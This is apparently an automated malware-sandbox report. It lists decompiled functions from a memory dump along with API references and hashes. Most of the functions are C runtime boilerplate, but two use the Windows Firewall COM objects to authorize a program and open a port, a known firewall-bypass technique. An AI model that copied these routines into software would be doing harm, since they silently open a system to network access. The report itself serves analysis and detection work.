Instruction Fuzzy Hash: 9A212B709086009BCB11EFAAECC1A1EB765EBC1392F648615FC569B1D1E7708F4A9B40

Uniqueness

Uniqueness Score: -1.00%

Function 00952087, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00952087(int _a4) {

				E0095205C(_a4);
				ExitProcess(_a4);
			}

0x0095208f
0x00952098

APIs

___crtCorExitProcess.LIBCMT ref: 0095208F

Part of subcall function 0095205C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00952094,00000000,?,0095740E,000000FF,0000001E,?,0095553F,00000000,00000001,00000000,?,00953BC7,00000018), ref: 00952066
Part of subcall function 0095205C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00952076

ExitProcess.KERNEL32 ref: 00952098

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: c5f9c2715319eb6bc1c61206eef728229804a729df396c9211e0554f77d19b7d
Instruction ID: f1e0577d739cb68999fcf86d898150bac6be2ccbdca6b415728e64cded40b469
Opcode Fuzzy Hash: c5f9c2715319eb6bc1c61206eef728229804a729df396c9211e0554f77d19b7d
Instruction Fuzzy Hash: 02B04C31005208FB8B112F22DC098497E15DA812A1B104010B808050B19A719952E690

Uniqueness

Uniqueness Score: -1.00%

Function 00954D4A, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00954D4A(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x96093c = _t6;
				if(_t6 != 0) {
					 *0x960a98 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00954d5f
0x00954d65
0x00954d6c
0x00954d73
0x00954d79
0x00954d6f
0x00954d6f
0x00954d6f

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00954D5F

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 42580f3cd50a8e482baf1a6fed4eecdcaf066ab660c87a3d2dfb19ba597a950d
Instruction ID: 651e4711db822789219f73a486871b66dfa816836c59d0be69ea2afe68ce97df
Opcode Fuzzy Hash: 42580f3cd50a8e482baf1a6fed4eecdcaf066ab660c87a3d2dfb19ba597a950d
Instruction Fuzzy Hash: 7DD05E726687059EEB009FB27C4972A3BDC9784396F14843AF80CC6190E6B0D990EB00

Uniqueness

Uniqueness Score: -1.00%

Function 009522A3, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E009522A3(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00952177(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}

0x009522a8
0x009522aa
0x009522ac
0x009522af
0x009522b8

APIs

_doexit.LIBCMT ref: 009522AF

Part of subcall function 00952177: __lock.LIBCMT ref: 00952185
Part of subcall function 00952177: __decode_pointer.LIBCMT ref: 009521BC
Part of subcall function 00952177: __decode_pointer.LIBCMT ref: 009521D1
Part of subcall function 00952177: __decode_pointer.LIBCMT ref: 009521FB
Part of subcall function 00952177: __decode_pointer.LIBCMT ref: 00952211
Part of subcall function 00952177: __decode_pointer.LIBCMT ref: 0095221E
Part of subcall function 00952177: __initterm.LIBCMT ref: 0095224D
Part of subcall function 00952177: __initterm.LIBCMT ref: 0095225D

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 1260caedc38204fa8cd238cecbb6fa8514e084d10855c94d8b2bdabbf277140c
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: 8BB0923268420833DA206642AC03F063A098BC2B60E280020BA0C191A1A9A3A9668189

Uniqueness

Uniqueness Score: -1.00%

Function 00953148, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00953148() {
				void* _t1;

				_t1 = E009530D6(0); // executed
				return _t1;
			}

0x0095314a
0x00953150

APIs

__encode_pointer.LIBCMT ref: 0095314A

Part of subcall function 009530D6: TlsGetValue.KERNEL32(00000000,?,0095314F,00000000,00955F7B,00960398,00000000,00000314,?,00953A4C,00960398,Microsoft Visual C++ Runtime Library,00012010), ref: 009530E8
Part of subcall function 009530D6: TlsGetValue.KERNEL32(00000004,?,0095314F,00000000,00955F7B,00960398,00000000,00000314,?,00953A4C,00960398,Microsoft Visual C++ Runtime Library,00012010), ref: 009530FF
Part of subcall function 009530D6: RtlEncodePointer.NTDLL(00000000,?,0095314F,00000000,00955F7B,00960398,00000000,00000314,?,00953A4C,00960398,Microsoft Visual C++ Runtime Library,00012010), ref: 0095313D

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: d88c59fb37c3ac3efa9aebd9d03d4402a3415bdb3d7875fcac80f6682ea5314c
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00951C57, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00951C57(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x95f008; // 0xe3da83e1
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x960128 = _t6;
				 *0x960124 = _t22;
				 *0x960120 = _t25;
				 *0x96011c = _t21;
				 *0x960118 = _t27;
				 *0x960114 = _t26;
				 *0x960140 = ss;
				 *0x960134 = cs;
				 *0x960110 = ds;
				 *0x96010c = es;
				 *0x960108 = fs;
				 *0x960104 = gs;
				asm("pushfd");
				_pop( *0x960138);
				 *0x96012c =  *_t31;
				 *0x960130 = _v0;
				 *0x96013c =  &_a4;
				 *0x960078 = 0x10001;
				_t11 =  *0x960130; // 0x0
				 *0x96002c = _t11;
				 *0x960020 = 0xc0000409;
				 *0x960024 = 1;
				_t12 =  *0x95f008; // 0xe3da83e1
				_v812 = _t12;
				_t13 =  *0x95f00c; // 0x1c257c1e
				_v808 = _t13;
				 *0x960070 = IsDebuggerPresent();
				_push(1);
				E00954E10(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x95c1b4);
				if( *0x960070 == 0) {
					_push(1);
					E00954E10(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00951c57
0x00951c57
0x00951c57
0x00951c57
0x00951c57
0x00951c57
0x00951c57
0x00951c5d
0x00951c5f
0x00951c5f
0x009524f7
0x009524fc
0x00952502
0x00952508
0x0095250e
0x00952514
0x0095251a
0x00952521
0x00952528
0x0095252f
0x00952536
0x0095253d
0x00952544
0x00952545
0x0095254e
0x00952556
0x0095255e
0x00952569
0x00952573
0x00952578
0x0095257d
0x00952587
0x00952591
0x00952596
0x0095259c
0x009525a1
0x009525ad
0x009525b2
0x009525b4
0x009525bc
0x009525c7
0x009525d4
0x009525d6
0x009525d8
0x009525dd
0x009525f1

APIs

IsDebuggerPresent.KERNEL32 ref: 009525A7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009525BC
UnhandledExceptionFilter.KERNEL32(0095C1B4), ref: 009525C7
GetCurrentProcess.KERNEL32(C0000409), ref: 009525E3
TerminateProcess.KERNEL32(00000000), ref: 009525EA

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 4c83c9493169b7eaf0d27d3722294605830d76f6e51f0d32f66f8ae9e9af11fc
Instruction ID: ad91c7f5bbd0f77a9126f9f170e17844dcd0dee6ec89da684beda9b1b5f0266f
Opcode Fuzzy Hash: 4c83c9493169b7eaf0d27d3722294605830d76f6e51f0d32f66f8ae9e9af11fc
Instruction Fuzzy Hash: E221FDB482D304DFCB45DF26F8856063BA4BB8A316F02445EE808872A1E7F05988EF49

Uniqueness

Uniqueness Score: -1.00%

Function 00958290, Relevance: 2.5, APIs: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00958290(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x95d2d4;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}

0x00958293
0x00958295
0x00958298
0x009582a0
0x009582a8
0x009582a8
0x009582ae
0x009582b0
0x009582b8
0x00000000
0x009582c1
0x009582b8
0x009582c8

APIs

GetProcessHeap.KERNEL32 ref: 009582B0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 009582C1

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 27726ddb31f4e957f87ee8dbe0d1acf4d48385b0bb210fe8f96840b1436ebf2c
Instruction ID: 3b29cec2642a544a38d61516240a6048d1a9b38b3e1bb05357a89b30bd0999de
Opcode Fuzzy Hash: 27726ddb31f4e957f87ee8dbe0d1acf4d48385b0bb210fe8f96840b1436ebf2c
Instruction Fuzzy Hash: E0E01A71210B01EFD724DBA6DC4CF637BA9EF88352F158408E96A97290CB70EC46DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0095461F, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0095461F() {

				SetUnhandledExceptionFilter(E009545DD);
				return 0;
			}

0x00954624
0x0095462c

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000045DD), ref: 00954624

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 009905d0afba2e838215f97207ffc369e968616fc33d66db23d453243f0cb800
Instruction ID: 7cd11b1ed6f013463e8f6fc7d843bedc996037ed8f2a1378f8845cfe690e1297
Opcode Fuzzy Hash: 009905d0afba2e838215f97207ffc369e968616fc33d66db23d453243f0cb800
Instruction Fuzzy Hash: 8C9002E02763008B4A8057B25D0950929A09F98B4F7810450B501E8094EE5041596711

Uniqueness

Uniqueness Score: -1.00%

Function 009517BE, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 164
comCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E009517BE(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				void* _t78;
				void* _t80;
				void* _t83;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				signed int _t120;

				_t115 = __edx;
				_t54 =  *0x95f008; // 0xe3da83e1
				_v8 = _t54 ^ _t120;
				_v52 = _a4;
				_v48 = _a8;
				__imp__CoInitialize(0);
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v28 = 0;
				_t59 = E009580F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t59,  &_v24);
				_t117 = _t59;
				if(_t59 >= 0) {
					_t100 = __imp__CoCreateInstance;
					_t74 =  *_t100( &_v24, 0, 5, 0x95c17c,  &_v36);
					_t117 = _t74;
					if(_t74 >= 0) {
						_t75 = _v36;
						_t115 =  &_v32;
						_t76 =  *((intOrPtr*)( *_t75 + 0x1c))(_t75,  &_v32);
						_t117 = _t76;
						if(_t76 >= 0) {
							_t77 = _v32;
							_t115 =  &_v40;
							_t78 =  *((intOrPtr*)( *_t77 + 0x1c))(_t77,  &_v40);
							_t117 = _t78;
							if(_t78 >= 0) {
								_t80 = E009580F0( &_v40, "HNetCfg.FwAuthorizedApplication");
								__imp__CLSIDFromProgID(_t80,  &_v24);
								_t117 = _t80;
								if(_t80 >= 0) {
									_t83 =  *_t100( &_v24, 0, 5, 0x95c17c,  &_v28);
									_t117 = _t83;
									if(_t83 >= 0) {
										 *((intOrPtr*)( *_v28 + 0x28))(_v28, E009580F0( &_v40, _v48));
										 *((intOrPtr*)( *_v28 + 0x20))(_v28, E009580F0(_t115, _v52));
										_t90 = _v28;
										 *((intOrPtr*)( *_t90 + 0x38))(_t90, 0);
										_t92 = _v28;
										 *((intOrPtr*)( *_t92 + 0x30))(_t92, 2);
										_t94 = _v28;
										 *((intOrPtr*)( *_t94 + 0x48))(_t94, 1);
										_t96 = _v40;
										_t115 =  &_v44;
										_t97 =  *((intOrPtr*)( *_t96 + 0x50))(_t96,  &_v44);
										_t117 = _t97;
										if(_t97 >= 0) {
											_t98 = _v44;
											_t117 =  *((intOrPtr*)( *_t98 + 0x20))(_t98, _v28);
										}
									}
								}
							}
						}
					}
				}
				_t60 = _v28;
				if(_t60 != 0) {
					 *((intOrPtr*)( *_t60 + 8))(_t60);
				}
				_t61 = _v44;
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				_t62 = _v40;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 8))(_t62);
				}
				_t63 = _v32;
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 8))(_t63);
				}
				_t64 = _v36;
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 8))(_t64);
				}
				__imp__CoUninitialize();
				return E00951C57(_t117, _t100, _v8 ^ _t120, _t115, 0, _t117);
			}

0x009517be
0x009517c4
0x009517cb
0x009517d4
0x009517dd
0x009517e0
0x009517ef
0x009517f2
0x009517f5
0x009517f8
0x009517fb
0x009517fe
0x00951804
0x0095180a
0x0095180e
0x00951814
0x0095182a
0x0095182c
0x00951830
0x00951836
0x0095183b
0x00951840
0x00951843
0x00951847
0x0095184d
0x00951852
0x00951857
0x0095185a
0x0095185e
0x0095186d
0x00951873
0x00951879
0x0095187d
0x00951893
0x00951895
0x00951899
0x009518ac
0x009518c0
0x009518c3
0x009518ca
0x009518cd
0x009518d5
0x009518d8
0x009518e0
0x009518e3
0x009518e8
0x009518ed
0x009518f0
0x009518f4
0x009518f6
0x00951902
0x00951902
0x009518f4
0x00951899
0x0095187d
0x0095185e
0x00951847
0x00951830
0x00951904
0x00951909
0x0095190e
0x0095190e
0x00951911
0x00951916
0x0095191b
0x0095191b
0x0095191e
0x00951923
0x00951928
0x00951928
0x0095192b
0x00951930
0x00951935
0x00951935
0x00951938
0x0095193d
0x00951942
0x00951942
0x00951945
0x0095195b

APIs

CoInitialize.OLE32(00000000), ref: 009517E0
_com_util::ConvertStringToBSTR.COMSUPP ref: 009517FE
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00951804
CoCreateInstance.OLE32(?,00000000,00000005,0095C17C,?), ref: 0095182A
_com_util::ConvertStringToBSTR.COMSUPP ref: 0095186D

Part of subcall function 009580F0: lstrlenA.KERNEL32(?,E3DA83E1,?,80004005,?,000000FE,?,00951112,00000000), ref: 00958137
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00951112,00000000), ref: 0095814D
Part of subcall function 009580F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00951112,00000000), ref: 0095815C
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00951112,00000000), ref: 009581EB
Part of subcall function 009580F0: GetLastError.KERNEL32(?,000000FE,?,00951112,00000000), ref: 00958206
Part of subcall function 009580F0: SysAllocString.OLEAUT32(00000000), ref: 00958221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00951873
CoCreateInstance.OLE32(?,00000000,00000005,0095C17C,?), ref: 00951893
_com_util::ConvertStringToBSTR.COMSUPP ref: 009518A3

Part of subcall function 009580F0: _malloc.LIBCMT ref: 009581A1

_com_util::ConvertStringToBSTR.COMSUPP ref: 009518B7
CoUninitialize.OLE32 ref: 00951945

Strings

HNetCfg.FwAuthorizedApplication, xrefs: 00951868
HNetCfg.FwMgr, xrefs: 009517EA

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize_malloclstrlen
String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 4233194485-1951265404
Opcode ID: 993146eaed241bbe51424f55f04bfa1d7d6abbf370d22a02fb1bea8ee609014a
Instruction ID: bebf96696cf1aa51f0afbf69a953278f38d49c7d989a34e3d9cd23112179eb0b
Opcode Fuzzy Hash: 993146eaed241bbe51424f55f04bfa1d7d6abbf370d22a02fb1bea8ee609014a
Instruction Fuzzy Hash: 3B512CB1E002199FCB10EBA9C898EEEF7B9EF88712B144555F915F7250DB319C45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0095195C, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 178
comCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0095195C(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				void* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t83;
				intOrPtr* _t84;
				void* _t85;
				void* _t87;
				void* _t90;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				void* _t107;
				intOrPtr* _t108;
				char _t130;
				signed int _t133;

				_t128 = __edx;
				_t61 =  *0x95f008; // 0xe3da83e1
				_v8 = _t61 ^ _t133;
				_v56 = _a4;
				_t130 = 0;
				_v60 = _a8;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v28 = 0;
				_t66 = E009580F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t66,  &_v24);
				_t110 = _t66;
				if(_t66 >= 0) {
					_t129 = __imp__CoCreateInstance;
					_t81 =  *_t129( &_v24, 0, 5, 0x95c17c,  &_v32);
					_t110 = _t81;
					if(_t81 >= 0) {
						_t82 = _v32;
						_t128 =  &_v44;
						_t83 =  *((intOrPtr*)( *_t82 + 0x1c))(_t82,  &_v44);
						_t110 = _t83;
						if(_t83 >= 0) {
							_t84 = _v44;
							_t128 =  &_v40;
							_t85 =  *((intOrPtr*)( *_t84 + 0x1c))(_t84,  &_v40);
							_t110 = _t85;
							if(_t85 >= 0) {
								_t87 = E009580F0( &_v40, "HNetCfg.FwOpenPort");
								__imp__CLSIDFromProgID(_t87,  &_v24);
								_t110 = _t87;
								if(_t87 >= 0) {
									_t90 =  *_t129( &_v24, 0, 5, 0x95c17c,  &_v28);
									_t110 = _t90;
									if(_t90 >= 0) {
										_t129 = _v60;
										_v52 = 0;
										_v48 = 0x100;
										if(E00951071(_v60,  &_v48,  &_v52) != 0) {
											_t93 = _v28;
											 *((intOrPtr*)( *_t93 + 0x38))(_t93, _v52);
											_t95 = _v28;
											 *((intOrPtr*)( *_t95 + 0x30))(_t95, _v48);
											 *((intOrPtr*)( *_v28 + 0x20))(_v28, E009580F0( &_v40, _v56));
											_t100 = _v28;
											 *((intOrPtr*)( *_t100 + 0x40))(_t100, 0);
											_t102 = _v28;
											 *((intOrPtr*)( *_t102 + 0x28))(_t102, 2);
											_t104 = _v28;
											 *((intOrPtr*)( *_t104 + 0x50))(_t104, 1);
											_t106 = _v40;
											_t128 =  &_v36;
											_t107 =  *((intOrPtr*)( *_t106 + 0x48))(_t106,  &_v36);
											_t110 = _t107;
											if(_t107 >= 0) {
												_t108 = _v36;
												_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v28);
											}
										}
										_t130 = 0;
									}
								}
							}
						}
					}
				}
				_t67 = _v28;
				if(_t67 != _t130) {
					 *((intOrPtr*)( *_t67 + 8))(_t67);
				}
				_t68 = _v36;
				if(_t68 != _t130) {
					 *((intOrPtr*)( *_t68 + 8))(_t68);
				}
				_t69 = _v40;
				if(_t69 != _t130) {
					 *((intOrPtr*)( *_t69 + 8))(_t69);
				}
				_t70 = _v44;
				if(_t70 != _t130) {
					 *((intOrPtr*)( *_t70 + 8))(_t70);
				}
				_t71 = _v32;
				if(_t71 != _t130) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				__imp__CoUninitialize();
				return E00951C57(_t110, _t110, _v8 ^ _t133, _t128, _t129, _t130);
			}

0x0095195c
0x00951962
0x00951969
0x00951972
0x00951978
0x0095197b
0x0095197e
0x0095198d
0x00951990
0x00951993
0x00951996
0x00951999
0x0095199c
0x009519a2
0x009519a8
0x009519ac
0x009519b2
0x009519c8
0x009519ca
0x009519ce
0x009519d4
0x009519d9
0x009519de
0x009519e1
0x009519e5
0x009519eb
0x009519f0
0x009519f5
0x009519f8
0x009519fc
0x00951a0b
0x00951a11
0x00951a17
0x00951a1b
0x00951a31
0x00951a33
0x00951a37
0x00951a3d
0x00951a43
0x00951a4a
0x00951a59
0x00951a5b
0x00951a64
0x00951a67
0x00951a70
0x00951a84
0x00951a87
0x00951a8f
0x00951a92
0x00951a9a
0x00951a9d
0x00951aa5
0x00951aa8
0x00951aad
0x00951ab2
0x00951ab5
0x00951ab9
0x00951abb
0x00951ac7
0x00951ac7
0x00951ab9
0x00951ac9
0x00951ac9
0x00951a37
0x00951a1b
0x009519fc
0x009519e5
0x009519ce
0x00951acb
0x00951ad0
0x00951ad5
0x00951ad5
0x00951ad8
0x00951add
0x00951ae2
0x00951ae2
0x00951ae5
0x00951aea
0x00951aef
0x00951aef
0x00951af2
0x00951af7
0x00951afc
0x00951afc
0x00951aff
0x00951b04
0x00951b09
0x00951b09
0x00951b0c
0x00951b22

APIs

CoInitialize.OLE32(00000000), ref: 0095197E
_com_util::ConvertStringToBSTR.COMSUPP ref: 0095199C
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 009519A2
CoCreateInstance.OLE32(?,00000000,00000005,0095C17C,?), ref: 009519C8
_com_util::ConvertStringToBSTR.COMSUPP ref: 00951A0B

Part of subcall function 009580F0: lstrlenA.KERNEL32(?,E3DA83E1,?,80004005,?,000000FE,?,00951112,00000000), ref: 00958137
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00951112,00000000), ref: 0095814D
Part of subcall function 009580F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00951112,00000000), ref: 0095815C
Part of subcall function 009580F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00951112,00000000), ref: 009581EB
Part of subcall function 009580F0: GetLastError.KERNEL32(?,000000FE,?,00951112,00000000), ref: 00958206
Part of subcall function 009580F0: SysAllocString.OLEAUT32(00000000), ref: 00958221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwOpenPort,?), ref: 00951A11
CoCreateInstance.OLE32(?,00000000,00000005,0095C17C,?), ref: 00951A31

Part of subcall function 00951071: __wcstoui64.LIBCMT ref: 009510DB

_com_util::ConvertStringToBSTR.COMSUPP ref: 00951A7B

Part of subcall function 009580F0: _malloc.LIBCMT ref: 009581A1

CoUninitialize.OLE32 ref: 00951B0C

Strings

HNetCfg.FwOpenPort, xrefs: 00951A06
HNetCfg.FwMgr, xrefs: 00951988

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize__wcstoui64_malloclstrlen
String ID: HNetCfg.FwMgr$HNetCfg.FwOpenPort
API String ID: 3570467124-3777566516
Opcode ID: 78c6b047ad5dc9d2e60c8983334333ac1a091c536412f05d480518dc75d945fc
Instruction ID: 03185a1fb97e80677f4977e02d93792f4220654107f026197b97f2847cf0d636
Opcode Fuzzy Hash: 78c6b047ad5dc9d2e60c8983334333ac1a091c536412f05d480518dc75d945fc
